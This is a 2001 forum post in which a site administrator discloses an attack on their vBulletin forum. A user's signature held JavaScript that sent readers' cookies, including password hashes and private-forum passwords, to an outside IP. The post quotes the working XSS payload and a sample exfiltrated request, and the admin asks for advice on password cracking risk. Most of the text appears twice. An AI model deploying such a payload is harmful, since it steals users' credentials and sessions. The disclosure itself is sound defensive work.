The following is a post I made in our forums at Tribalwar.com after a hacking attempt tonight:
Posted 08-01-2001 12:05 AM
--------------------------------------------------------------------------------
Tonight the user daerid set up a piece of javascript code which allowed him to steal the passwords to private forums of everyone who read a specific thread and an encrypted version of each users password. This code will pop open a new window and request a specific page from the 64.32.63.7 host server. While this page will not exist a log can be kept of all such requests. This will pass all the contents of our sites cookie the user has via the request. This means that this user (daerid) now has a record of each persons userid and userpassword in an encrypted form who viewed this thread. Also, if that user had access to any of our private forums he will have an unencrypted view of those passwords.
Here is the offending code, placed in his signature:
<IMG SRC="http://64.32.63.7/images/clear.gif"HEIGHT=1 WIDTH=1 ONLOAD="open('http://64.32.63.7:83/twstuff/?twcookie='+escape(document.cookie),'','top=5000,left=5000' );self.focus();">
Here is a sample of the request that would be sent:
http://64.32.63.7:83/twstuff/? twcookie=bbstyleid=3;%20bbforumpass[63]=removedpas
sword;%20bblastvisit=996471155;%20bbuserid=4;%20bb
password=83e4e22d6afc296a2df4e9a6d3;%20sessionhash
=db335a9e8fce257f02a9b9a8c661fd24;%20bbthreadview[
63253]=996636210
The "removedpassword" would be stored in plain text and would be easy to link to each individual private forum.
Assuming Daerid has access to the 64.32.63.7 server he will have a list of encrypted passwords for whoever view the thread. He may be unable to decrypt the passwords and thus resetting may be unnecessary. The choice is up to the individual user. We STRONGLY recommend that anyone who viewed the "Word" thread in which this code was placed reset their password. If you are unsure if you viewed this thread the safest course is to reset your password anyway.
--------------------------------------------------------------------------------
We have since added the ONLOAD and document.cookie keywords to our list of censored text.
The private forums are our own hack to vBulletin and we do not send the private forum pass encrypted, an oversight by our coder which we will remedy of course. This will give the user a list of encypted passwords to each user. There does exist however the possibility of the userpass being decrypted.
I'm hoping I'm flawed somewhere in my understanding of this hack but it looks straightforward. Can someone comment on how hard it would be to crack a userpassword gained in this manner? vBulletin isn't my area of expertise on our site; are passwords encoded differently each session? I hope that is the case!
Posted 08-01-2001 12:05 AM
--------------------------------------------------------------------------------
Tonight the user daerid set up a piece of javascript code which allowed him to steal the passwords to private forums of everyone who read a specific thread and an encrypted version of each users password. This code will pop open a new window and request a specific page from the 64.32.63.7 host server. While this page will not exist a log can be kept of all such requests. This will pass all the contents of our sites cookie the user has via the request. This means that this user (daerid) now has a record of each persons userid and userpassword in an encrypted form who viewed this thread. Also, if that user had access to any of our private forums he will have an unencrypted view of those passwords.
Here is the offending code, placed in his signature:
<IMG SRC="http://64.32.63.7/images/clear.gif"HEIGHT=1 WIDTH=1 ONLOAD="open('http://64.32.63.7:83/twstuff/?twcookie='+escape(document.cookie),'','top=5000,left=5000' );self.focus();">
Here is a sample of the request that would be sent:
http://64.32.63.7:83/twstuff/? twcookie=bbstyleid=3;%20bbforumpass[63]=removedpas
sword;%20bblastvisit=996471155;%20bbuserid=4;%20bb
password=83e4e22d6afc296a2df4e9a6d3;%20sessionhash
=db335a9e8fce257f02a9b9a8c661fd24;%20bbthreadview[
63253]=996636210
The "removedpassword" would be stored in plain text and would be easy to link to each individual private forum.
Assuming Daerid has access to the 64.32.63.7 server he will have a list of encrypted passwords for whoever view the thread. He may be unable to decrypt the passwords and thus resetting may be unnecessary. The choice is up to the individual user. We STRONGLY recommend that anyone who viewed the "Word" thread in which this code was placed reset their password. If you are unsure if you viewed this thread the safest course is to reset your password anyway.
--------------------------------------------------------------------------------
We have since added the ONLOAD and document.cookie keywords to our list of censored text.
The private forums are our own hack to vBulletin and we do not send the private forum pass encrypted, an oversight by our coder which we will remedy of course. This will give the user a list of encypted passwords to each user. There does exist however the possibility of the userpass being decrypted.
I'm hoping I'm flawed somewhere in my understanding of this hack but it looks straightforward. Can someone comment on how hard it would be to crack a userpassword gained in this manner? vBulletin isn't my area of expertise on our site; are passwords encoded differently each session? I hope that is the case!
Comment